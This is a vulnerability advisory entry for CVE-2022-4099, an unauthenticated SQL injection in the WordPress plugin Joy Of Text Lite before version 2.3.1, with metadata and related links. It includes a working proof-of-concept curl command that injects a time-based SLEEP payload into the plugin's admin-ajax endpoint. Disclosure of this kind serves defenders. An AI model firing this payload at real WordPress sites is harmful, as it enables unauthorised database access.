Lucene search
CydaveWPEX-ID:A282DD39-926D-406B-B8F5-E4C6E0C2C028HistoryDec 08, 2022 - 12:00 a.m.
Joy Of Text Lite < 2.3.1 - Unauthenticated SQLi
2022-12-0800:00:00
cydave
220
joy of text
lite
version 2.3.1
unauthenticated
sqli
curl
command
exploit
EPSS
0.002
Percentile
58.0%
The plugin does not properly sanitise and escape some parameters before using them in SQL statements accessible to unauthenticated users, leading to unauthenticated SQL injection
Invoke the following curl command to induce a 5 second sleep:
time curl 'https://example.com/wp-admin/admin-ajax.php?action=send_message' \
--data 'jotmemid=x-+(SELECT+1+FROM+(SELECT(SLEEP(5)))aaaaaa)'Related
nvd
nvd
CVE-2022-4099
2023-01-02 22:15:16
cvelist
cvelist
CVE-2022-4099 Joy Of Text Lite < 2.3.1 - Unauthenticated SQLi
2023-01-02 21:49:32
prion
prion
Sql injection
2023-01-02 22:15:00
cve
cve
CVE-2022-4099
2023-01-02 22:15:16
wpvulndb
wpvulndb
Joy Of Text Lite < 2.3.1 - Unauthenticated SQLi
2022-12-08 00:00:00